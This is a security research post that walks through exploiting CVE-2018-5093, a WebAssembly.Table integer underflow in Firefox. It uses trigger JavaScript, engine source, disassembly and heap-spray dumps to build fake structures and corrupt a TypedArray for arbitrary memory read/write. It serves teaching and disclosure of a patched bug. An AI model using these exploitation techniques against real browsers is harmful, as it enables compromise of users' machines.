By Arthur Gerkis and David Barksdale

This series of posts makes public some old Firefox research which our Zero-Day customers had access to before it was known publicly, and then our N-Day customers after it was patched. We’ve also used this research to teach browser exploitation in our Vuln-Dev Master Class.

In this post we start with an integer underflow in part of Firefox’s WebAssembly code and use it to read and write memory in the sandboxed content process. In later posts we will then use this to execute arbitrary code in the content process, and finally escape the sandbox to the broker process and execute calc.exe.

WebAssembly.Table Integer Underflow (CVE-2018-5093)

This vulnerability was reported to Mozilla by Alex Gaynor as Bug #1415291 and fixed in Firefox 58 and 59.

The vulnerability is triggered using a WebAssembly.Table object which represents an array-like structure that stores function references and provides a bridge between WebAssembly and JavaScript. The following JavaScript code results in a memory read outside the bounds of the table.

// Creates a new WebAssembly Table object.
var wasmTable = new WebAssembly.Table({
  // Provides type of the element.
  element: 'anyfunc',
  // Provides initial size of the table (length of the elements).
  initial: 0
});

// Tries to get the function reference at the index 0x100.
wasmTable.get(0x100);

The JavaScript constructor triggers a call to WasmTableObject::construct() shown below.

/* static */ WasmTableObject*
WasmTableObject::create(JSContext* cx, const Limits& limits)
{
    RootedObject proto(cx, &cx->global()->getPrototype(JSProto_WasmTable).toObject());

    AutoSetNewObjectMetadata metadata(cx);
    RootedWasmTableObject obj(cx, NewObjectWithGivenProto<WasmTableObject>(cx, proto));
    if (!obj)
        return nullptr;

    MOZ_ASSERT(obj->isNewborn());

    TableDesc td(TableKind::AnyFunction, limits);
    td.external = true;

    SharedTable table = Table::create(cx, td, obj);
    if (!table)
        return nullptr;

    obj->initReservedSlot(TABLE_SLOT, PrivateValue(table.forget().take()));

    MOZ_ASSERT(!obj->isNewborn());
    return obj;
}

/* static */ bool
WasmTableObject::construct(JSContext* cx, unsigned argc, Value* vp)
{
    CallArgs args = CallArgsFromVp(argc, vp);

    if (!ThrowIfNotConstructing(cx, args, "Table"))
        return false;

    if (!args.requireAtLeast(cx, "WebAssembly.Table", 1))
        return false;

    if (!args.get(0).isObject()) {
        JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr, JSMSG_WASM_BAD_DESC_ARG, "table");
        return false;
    }

...

    RootedWasmTableObject table(cx, WasmTableObject::create(cx, limits));
    if (!table)
        return false;

    args.rval().setObject(*table);
    return true;
}

WasmTableObject::construct() performs different kinds of validations and then calls WasmTableObject::create() which is responsible for the actual table creation.

The TableDesc object holds properties of the new WebAssembly.Table to be created including the type of the array (external or internal) and limits of the table. The call to Table::create() creates a new WebAssembly table object with the initial elements length of 0.

/* static */ SharedTable
Table::create(JSContext* cx, const TableDesc& desc, HandleWasmTableObject maybeObject)
{
    // The raw element type of a Table depends on whether it is external: an
    // external table can contain functions from multiple instances and thus
    // must store an additional instance pointer in each element.
    UniqueByteArray array;
    if (desc.external)
        array.reset((uint8_t*)cx->pod_calloc<ExternalTableElem>(desc.limits.initial));
    else
        array.reset((uint8_t*)cx->pod_calloc<void*>(desc.limits.initial));
    if (!array)
        return nullptr;

    return SharedTable(cx->new_<Table>(cx, desc, maybeObject, Move(array)));
}

The desc.external variable is set to true as it is an external (user-provided) table creation request (non-external tables are used for JavaScript engine runtime internally and are not possible to control directly). The desc.limits.initial variable is 0 and the pod_calloc() function allocates the minimum possible buffer size of 8 bytes. The address of array (or array_ as defined in Table fields) is the base address when accessing the table array by index.

Integer Underflow

Once the WebAssembly get() function is called, the WasmTableObject::getImpl() method is eventually called.

/* static */ bool
WasmTableObject::getImpl(JSContext* cx, const CallArgs& args)
{
    RootedWasmTableObject tableObj(cx, &args.thisv().toObject().as<WasmTableObject>());
    const Table& table = tableObj->table();

    uint32_t index;
    if (!ToNonWrappingUint32(cx, args.get(0), table.length() - 1, "Table", "get index", &index))
        return false;

    ExternalTableElem& elem = table.externalArray()[index];
    if (!elem.code) {
        args.rval().setNull();
        return true;
    }

    Instance& instance = *elem.tls->instance;
    const CodeRange& codeRange = *instance.code().lookupRange(elem.code);
    MOZ_ASSERT(codeRange.isFunction());

    RootedWasmInstanceObject instanceObj(cx, instance.object());
    RootedFunction fun(cx);
    if (!instanceObj->getExportedFunction(cx, instanceObj, codeRange.funcIndex(), &fun))
        return false;

    args.rval().setObject(*fun);
    return true;
}

The third argument to ToNonWrappingUint32() is the maximum value allowed to be stored in index. When table.length() is 0 this value becomes -1, however the argument type is uint32_t, causing the value to become UINT32_MAX, defeating the range check entirely. The same bug exists in WasmTableObject::setImpl() defeating the range check on set().

This vulnerability can be used to read or write past the bounds of the array. However,
writing out of bounds is limited in how and what it can write. Reading out of bounds cannot be directly used to leak any useful data into JavaScript, but it can be used to create a fake hash table.

Fake Hash Table

To ensure that required data is located at a fixed address the heap is sprayed using JavaScript arrays. This data is then used to create a few fake structures. The heap spray causes the following data to be placed at address 0x4d0f0000.

4d0f0000 4d0f0000 4d0f0000 4d0f000c 4d0f0000
4d0f0010 4d0eff9c 4d0f0028 4d0f00b0 4d0f0028
4d0f0020 4d0f0020 00000002 00000000 00000000
4d0f0030 4d0effd4 00000002 4d0f0030 00000000
4d0f0040 00000000 00000000 00000010 00000000
4d0f0050 00000000 00000000 00000000 00000000
4d0f0060 143d6170 ffffff87 00000000 00000000
4d0f0070 00000000 00000000 00000000 00000000
4d0f0080 0000007b 00000030 4d0f0080 cccccccc
4d0f0090 00000000 00000000 14642190 ffffff8c
4d0f00a0 00000000 00000000 13d59320 ffffff8c
4d0f00b0 cccccccc 7e000000 146421ea 00000000
4d0f00c0 00000000 00000000 00000000 00000000
4d0f00d0 00000000 00000000 00000000 00000000
4d0f00e0 00000000 00000000 00000000 00000000
4d0f00f0 00000000 00000000 00000000 00000000
4d0f0100 4d0f0000 4d0f0000 4d0f0000 4d0f0000
4d0f0110 4d0f0000 4d0f0000 4d0f0000 4d0f0000

The first 0x100 bytes contain fake structure fields, the rest is just a filler which points back to the beginning of the data.

Once the heap spray is done, the vulnerability is triggered by creating a new WebAssembly table and calling the get() function on that table. The following code is then reached.

; File: xul.dll
; Version: 54.0.0.6368

.text:11D4EB33 private: static bool __cdecl js::WasmTableObject::getImpl(struct JSContext *, class JS::CallArgs const &) proc near
...
.text:11D4EB96                 jz      loc_11D4EC40
.text:11D4EB9C                 mov     eax, [ebp+var_4]
.text:11D4EB9F                 mov     ecx, [ebp+var_8]
.text:11D4EBA2                 mov     eax, [eax+30h] ; eax will point to the array_ field
.text:11D4EBA5                 mov     edx, [eax+ecx*8] ; eax+ecx*8 points inside of the heap spray, edx becomes 0x4d0f0000
.text:11D4EBA8                 test    edx, edx        ; if (!elem.code) ... (edx = 0x4d0f0000)
.text:11D4EBAA                 jnz     short loc_11D4EBBF
...
.text:11D4EBBF
.text:11D4EBBF loc_11D4EBBF:
.text:11D4EBBF                 mov     eax, [eax+ecx*8+4] ; reads from the spray and sets eax to 4d0f0000
.text:11D4EBC3                 push    edx
.text:11D4EBC4                 mov     esi, [eax+4]    ; esi will point to the fake js::wasm::Instance object (4d0f0000)
.text:11D4EBC7                 mov     ecx, [esi+8]    ; ecx will point to the fake js::wasm::Code object (4d0f000c)
.text:11D4EBCA                 call    js::wasm::Code::lookupRange(void *)

The array_ field is located at offset 0x30 in the Table object, shown below.

0:000> dt xul!js::wasm::Table
   +0x000 mRefCnt          : Uint4B
   +0x004 maybeObject_     : js::ReadBarriered<js::WasmTableObject *>
   +0x008 observers_       : JS::WeakCache<JS::GCHashSet<js::ReadBarriered<js::WasmInstanceObject *>,js::MovableCellHasher<js::ReadBarriered<js::WasmInstanceObject *> >,js::SystemAllocPolicy> >
   +0x030 array_           : mozilla::UniquePtr<unsigned char [0],JS::FreePolicy>
   +0x034 kind_            : js::wasm::TableKind
   +0x038 length_          : Uint4B
   +0x03c maximum_         : mozilla::Maybe<unsigned int>
   +0x044 external_        : Bool

The address of the array_ field is added to the index which is multiplied by 0x8 (the UniqueByteArray structure takes 0x8 bytes and each function reference represents this structure).

Next is the call to the Code::lookupRange() method.

const CodeRange*
Code::lookupRange(void* pc) const
{
    CodeRange::PC target((uint8_t*)pc - segment_->base());
    size_t lowerBound = 0;
    size_t upperBound = metadata_->codeRanges.length();
    size_t match;
    if (!BinarySearch(metadata_->codeRanges, lowerBound, upperBound, target, &match))
        return nullptr;

    return &metadata_->codeRanges[match];
}

The Code object is located at address 0x4d0f000c in our heap spray and is constructed such that BinarySearch() will return true and match will be set to 1. The match is the index of the CodeRange structure in the metadata_->codeRanges vector. The size of the CodeRange object is 0x20 bytes and as such lookupRange() returns the CodeRange object which is located at address 0x4d0f0040 in our heap spray.

Next in WasmTableObject::getImpl() an object_ field pointing to the WasmInstanceObject object is requested, as shown below.

WasmInstanceObject*
Instance::object() const
{
    return object_;
}

A problem appears due to the way the garbage collector works and because some structures have been faked: they do not represent real JavaScript objects and have not gone through the real allocation mechanisms.

The Generation Garbage Collector (GGC), introduced in Mozilla Firefox version 32.0, has two heap types: nursery and tenured. The nursery heap is used for a short-lived objects, and the tenured heap for long-lived objects.

When getting the WasmInstanceObject object, the JavaScript engine runtime requests details about the object state, namely whether it is in the nursery or in the tenured heap. Eventually the JSObject::readBarrier() method is called, as shown below.

/* static */ MOZ_ALWAYS_INLINE void
JSObject::readBarrier(JSObject* obj)
{
    if (obj && obj->isTenured())
        obj->asTenured().readBarrier(&obj->asTenured());
}

The method Cell::isTenured() checks whether the object is inside of tenured heap, as shown below.

MOZ_ALWAYS_INLINE bool isTenured() const { return !IsInsideNursery(this); }

The IsInsideNursery() function is shown below.

MOZ_ALWAYS_INLINE bool
IsInsideNursery(const js::gc::Cell* cell)
{
    if (!cell)
        return false;
    uintptr_t addr = uintptr_t(cell);
    addr &= ~js::gc::ChunkMask;
    addr |= js::gc::ChunkLocationOffset;
    auto location = *reinterpret_cast<ChunkLocation*>(addr);
    MOZ_ASSERT(location == ChunkLocation::Nursery || location == ChunkLocation::TenuredHeap);
    return location == ChunkLocation::Nursery;
}

Cell is the base class of all classes being allocated by GC. Chunks are the largest unit used by the allocator and are 1MB. The ChunkLocation enum denotes the type of the heap, as shown below.

enum class ChunkLocation : uint32_t
{
    Invalid = 0,
    Nursery = 1,
    TenuredHeap = 2
};

The IsInsideNursery() function converts object addresses to the address of the associated chunk and checks whether the chunk belongs to the nursery or tenured heap. If it is in the tenured heap, then additional operations on the object are performed. This code path should be avoided as it would unnecessarily complicate the exploit. The ChunkLocation is within the our heap spray so we fake it by setting it to Nursery.

After that, the Instance::object() method successfully returns a new WasmInstanceObject object which is located at address 0x4d0f0000.

The next relevant call is to the WasmInstanceObject::getExportedFunction() method as it allows memory corruption at an arbitrary address. The method receives valid objects passed in as arguments and also receives the controllable funcIndex variable which we set to 0.

/* static */ bool
WasmInstanceObject::getExportedFunction(JSContext* cx, HandleWasmInstanceObject instanceObj,
                                        uint32_t funcIndex, MutableHandleFunction fun)
{
    if (ExportMap::Ptr p = instanceObj->exports().lookup(funcIndex)) {
        fun.set(p->value());
        return true;
    }

    const Instance& instance = instanceObj->instance();
    unsigned numArgs = instance.metadata().lookupFuncExport(funcIndex).sig().args().length();

    // asm.js needs to act like a normal JS function which means having the name
    // from the original source and being callable as a constructor.
    if (instance.isAsmJS()) {
        RootedAtom name(cx, instance.code().getFuncAtom(cx, funcIndex));
        if (!name)
            return false;

        fun.set(NewNativeConstructor(cx, WasmCall, numArgs, name, gc::AllocKind::FUNCTION_EXTENDED,
                                     SingletonObject, JSFunction::ASMJS_CTOR));
        if (!fun)
            return false;
    } else {
        RootedAtom name(cx, NumberToAtom(cx, funcIndex));
        if (!name)
            return false;

        fun.set(NewNativeFunction(cx, WasmCall, numArgs, name, gc::AllocKind::FUNCTION_EXTENDED));
        if (!fun)
            return false;
    }

    fun->setExtendedSlot(FunctionExtended::WASM_INSTANCE_SLOT, ObjectValue(*instanceObj));
    fun->setExtendedSlot(FunctionExtended::WASM_FUNC_INDEX_SLOT, Int32Value(funcIndex));

    if (!instanceObj->exports().putNew(funcIndex, fun)) {
        ReportOutOfMemory(cx);
        return false;
    }

    return true;
}

The instanceObj->exports() call returns a hash table. We fail the hash table lookup in order to reach the call to putNew(). Next, inside of the Metadata::lookupFuncExport() method, a second binary search is performed and it must return a result.

const FuncExport&
Metadata::lookupFuncExport(uint32_t funcIndex) const
{
    size_t match;
    if (!BinarySearch(ProjectFuncIndex(funcExports), 0, funcExports.length(), funcIndex, &match))
        MOZ_CRASH("missing function export");

    return funcExports[match];
}

The Metadata object is also fake and is located at address 0x4d0f0000. BinarySearch() calls BinarySearchIf() with arguments aContainer and aEnd under our control.

0:000> ln eip
win_build\\dist\\include\\mozilla\\binarysearch.h(80)+0xe
(035d1c00)   xul!mozilla::BinarySearchIf<ProjectFuncIndex,mozilla::detail::BinarySearchDefaultComparator<unsigned int> >+0x1e   |  (035d1c60)   xul!mozilla::BinarySearchIf<mozilla::Vector<js::wasm::Instance *,0,js::SystemAllocPolicy>,InstanceComparator>

0:000> dv
            aContainer = 0x012fe074
                aBegin = 0
                  aEnd = 2
              aCompare = 0x012fe078
aMatchOrInsertionPoint = 0x012fe070
                  high = 2
                   low = 0
                middle = <value unavailable>

0:000> dx -r1 (*((xul!ProjectFuncIndex *)0x12fe074))
(*((xul!ProjectFuncIndex *)0x12fe074))                 [Type: ProjectFuncIndex]
    [+0x000] funcExports      : 0x4d0f0030 [Type: mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy> &]

0:000> dx -r1 (*((xul!mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy> *)0x4d0f0030))
(*((xul!mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy> *)0x4d0f0030))                 [Type: mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy>]
    kElemIsPod       : false [Type: bool]
    kMaxInlineBytes  : 0x3f3 [Type: unsigned int]
    kInlineCapacity  : 0x0 [Type: unsigned int]
    [+0x000] mBegin           : 0x4d0effd4 [Type: js::wasm::FuncExport *]
    [+0x004] mLength          : 0x2 [Type: unsigned int]
    [+0x008] mTail            [Type: mozilla::Vector<js::wasm::FuncExport,0,js::SystemAllocPolicy>::CRAndStorage<0,0>]
    sMaxInlineStorage : 0x0 [Type: unsigned int]

Address 0x4d0f0040 contains 0 in order to return true from BinarySearchIf().

; File: xul.dll
; Version: 54.0.0.6368

.text:11D666D2 bool __cdecl mozilla::BinarySearchIf<struct ProjectFuncIndex, class mozilla::detail::BinarySearchDefaultComparator<unsigned int>>(struct ProjectFuncIndex const &, unsigned int, unsigned int, class mozilla::detail::BinarySearchDefaultComparator<unsigned int> const &, unsigned int *) proc near
.text:11D666D2
.text:11D666D2 arg_0           = dword ptr  8
.text:11D666D2 arg_4           = dword ptr  0Ch
.text:11D666D2 arg_8           = dword ptr  10h
.text:11D666D2
...
.text:11D666E5
.text:11D666E5 loc_11D666E5:
.text:11D666E5                 mov     ecx, [ebp+arg_4]
.text:11D666E8                 mov     edx, edi
.text:11D666EA                 sub     edx, esi
.text:11D666EC                 shr     edx, 1
.text:11D666EE                 add     edx, esi
.text:11D666F0                 imul    eax, edx, 3Ch   ; edx = 0x1
.text:11D666F3                 mov     eax, [eax+ebx+30h] ; mov eax,dword ptr [eax+ebx+30h] ds:002b:4d0f0040=00000000
.text:11D666F7                 mov     [ebp+arg_0], eax
.text:11D666FA                 lea     eax, [ebp+arg_0]
.text:11D666FD                 push    eax
.text:11D666FE                 call    mozilla::detail::BinarySearchDefaultComparator<uint>::operator()<uint>(uint const &)
.text:11D66703                 test    eax, eax        ; eax = 0x0, will return from the function
.text:11D66705                 jz      short loc_11D66720
...
.text:11D6671B loc_11D6671B:
.text:11D6671B                 pop     edi
.text:11D6671C                 pop     esi
.text:11D6671D                 pop     ebx
.text:11D6671E                 pop     ebp
.text:11D6671F                 retn
.text:11D66720 ; ---------------------------------------------------------------------------
.text:11D66720
.text:11D66720 loc_11D66720:
.text:11D66720                 mov     eax, [ebp+arg_8]
.text:11D66723                 mov     [eax], edx
.text:11D66725                 mov     al, 1
.text:11D66727                 jmp     short loc_11D6671B
.text:11D66727 bool __cdecl mozilla::BinarySearchIf<struct ProjectFuncIndex, class mozilla::detail::BinarySearchDefaultComparator<unsigned int>>(struct ProjectFuncIndex const &, unsigned int, unsigned int, class mozilla::detail::BinarySearchDefaultComparator<unsigned int> const &, unsigned int *) endp

This brings us to the call to putNew() which will try to put the key funcIndex and the value fun into the hash table.

    template <typename... Args>
    MOZ_MUST_USE bool putNew(const Lookup& l, Args&&... args)
    {
        if (!this->checkSimulatedOOM())
            return false;

        if (!EnsureHash<HashPolicy>(l))
            return false;

        if (checkOverloaded() == RehashFailed)
            return false;

        putNewInfallible(l, mozilla::Forward<Args>(args)...);
        return true;
    }

The HashTable::putNew() method wraps a call to HashTable::putNewInfallible(), shown below.

    template <typename... Args>
    void putNewInfallible(const Lookup& l, Args&&... args)
    {
        MOZ_ASSERT(!lookup(l).found());
        mozilla::ReentrancyGuard g(*this);
        putNewInfallibleInternal(l, mozilla::Forward<Args>(args)...);
    }

Which in turn wraps another call to HashTable::putNewInfallibleInternal(), shown below.

    template <typename... Args>
    void putNewInfallibleInternal(const Lookup& l, Args&&... args)
    {
        MOZ_ASSERT(table);

        HashNumber keyHash = prepareHash(l);
        Entry* entry = &findFreeEntry(keyHash);
...
    }

The HashTable::prepareHash() method calculates the hash for the given key and in our case will return 0xfffffffe. This will cause findFreeEntry() to corrupt the JSValueTag at 0x4d0f0064, changing it from JSVAL_TAG_STRING (0xffffff86) to JSVAL_TAG_SYMBOL (0xffffff87), as shown below.

; File: xul.dll
; Version: 54.0.0.6368

.text:10BE112F private: class js::detail::HashTableEntry<class js::HashMapEntry<unsigned int, class js::jit::MDefinition *>> & __thiscall js::detail::HashTable<class js::HashMapEntry<unsigned int, class js::jit::MDefinition *>, struct js::HashMap<unsigned int, class js::jit::MDefinition *, struct js::DefaultHasher<unsigned int>, class js::SystemAllocPolicy>::MapHashPolicy, class js::SystemAllocPolicy>::findFreeEntry(unsigned int) proc near
.text:10BE112F
.text:10BE112F var_4           = dword ptr -4
.text:10BE112F arg_0           = dword ptr  8
.text:10BE112F
.text:10BE112F                 push    ebp
.text:10BE1130                 mov     ebp, esp
.text:10BE1132                 push    ecx
.text:10BE1133                 push    ebx
.text:10BE1134                 push    esi
.text:10BE1135                 mov     ebx, ecx
.text:10BE1137                 push    edi
.text:10BE1138                 mov     edi, [ebp+arg_0]
.text:10BE113B                 mov     esi, edi
.text:10BE113D                 movzx   ecx, byte ptr [ebx+7] ; movzx ecx,byte ptr [ebx+7]       ds:002b:4d0f00b7=7e
.text:10BE1141                 shr     esi, cl         ; 0xfffffffe >>> 0x7e, esi becomes 0x3 (in inlined hash1() call)
.text:10BE1143                 mov     edx, esi
.text:10BE1145                 mov     [ebp+var_4], ecx
.text:10BE1148                 shl     edx, 4
.text:10BE114B                 add     edx, [ebx+8]    ; add edx,dword ptr [ebx+8] ds:002b:4d0f00b8=4d0f0034 (edx = 0x30)
.text:10BE114E                 cmp     dword ptr [edx], 1 ; cmp dword ptr [edx],1    ds:002b:4d0f0064=ffffff86 (inlined entry->isLive())
.text:10BE1151                 jbe     short loc_10BE1180
.text:10BE1153                 push    20h ; start of inlined hash2() call
.text:10BE1155                 pop     eax
.text:10BE1156                 sub     eax, ecx
.text:10BE1158                 mov     ecx, eax
.text:10BE115A                 shl     edi, cl
.text:10BE115C                 mov     ecx, [ebp+var_4]
.text:10BE115F                 shr     edi, cl
.text:10BE1161                 mov     ecx, eax
.text:10BE1163                 xor     eax, eax
.text:10BE1165                 or      edi, 1
.text:10BE1168                 inc     eax
.text:10BE1169                 shl     eax, cl
.text:10BE116B                 dec     eax ; end of inlined hash2() call
.text:10BE116C
.text:10BE116C loc_10BE116C:
.text:10BE116C                 or      dword ptr [edx], 1 ; or dword ptr [edx],1    ds:002b:4d0f0064=ffffff86 (inlined entry->setCollision() call)
.text:10BE116F                 sub     esi, edi
.text:10BE1171                 and     esi, eax
.text:10BE1173                 mov     edx, esi
.text:10BE1175                 shl     edx, 4
.text:10BE1178                 add     edx, [ebx+8]
.text:10BE117B                 cmp     dword ptr [edx], 1 ; (inlined entry->isLive())
.text:10BE117E                 ja      short loc_10BE116C ;
.text:10BE1180
.text:10BE1180 loc_10BE1180:
.text:10BE1180                 pop     edi
.text:10BE1181                 pop     esi
.text:10BE1182                 mov     eax, edx
.text:10BE1184                 pop     ebx
.text:10BE1185                 mov     esp, ebp
.text:10BE1187                 pop     ebp
.text:10BE1188                 retn    4

Fake Symbol

The heap spray contains a JSString at address 0x4d0f0060, as shown below.

0:000> dd 4d0f0060
4d0f0060  13cd01a0 ffffff86 00000000 00000000
4d0f0070  00000000 00000000 00000000 00000000
4d0f0080  0000007b 00000030 4d0f0080 cccccccc
4d0f0090  00000000 00000000 16712200 ffffff8c
4d0f00a0  00000000 00000000 09eb3360 ffffff8c

After corrupting the JSValueTag, the string becomes a fake JS::Symbol object. By calling toString() on the fake symbol, 0x30 bytes from address 0x4d0f0080 are leaked. This includes the address of a TypedArray object at 0x4d0f0098 and the address of an iframe at 0x4d0f00a8 to be used later.

Arbitrary Memory Read/Write

Once the address of the TypedArray object has been leaked, the corrupted part of the heap spray is restored to its original contents and the write address is updated to point to the unaligned address of the length field of the TypedArray object. The vulnerability is then triggered a second time. Below is the contents of the Typed Array object before.

0:000> dd 14642200
14642200  143f4cb8 1463fa18 00000000 04bf7198
14642210  00000000 ffffff83 00000010 ffffff81
14642220  00000000 ffffff81 14642230 00000000
14642230  00000000 00000000 00000000 00000000
14642240  00000000 00000000 00000000 00000000
14642250  00000000 00000000 00010000 00000000
14642260  00000000 00000000 00000000 00000000
14642270  143f4cb8 1463fa18 00000000 04bf7198

At address 0x14642218 the TypedArray length is located, the data buffer starts at 0x14642230, and the next TypedArray is located at address 0x14642270. Below is the contents after the write changes the length from 0x10 to 0x10010.

0:000> dd 14642200
14642200  143f4cb8 1463fa18 00000000 04bf7198
14642210  00000000 ffffff83 00010010 ffffff81
14642220  00000000 ffffff81 14642230 00000000
14642230  00000000 00000000 00000000 00000000
14642240  00000000 00000000 00000000 00000000
14642250  00000000 00000000 00010000 00000000
14642260  00000000 00000000 00000000 00000000
14642270  143f4cb8 1463fa18 00000000 04bf7198

The corrupted TypedArray is then used to overwrite length of the next adjacent TypedArray with 0xffffffff. This way arbitrary memory read/write is achieved.

Animation showing the vulnerability being exploited.

In the next post in this series we will use the ability to read and write arbitrary memory to achieve code execution.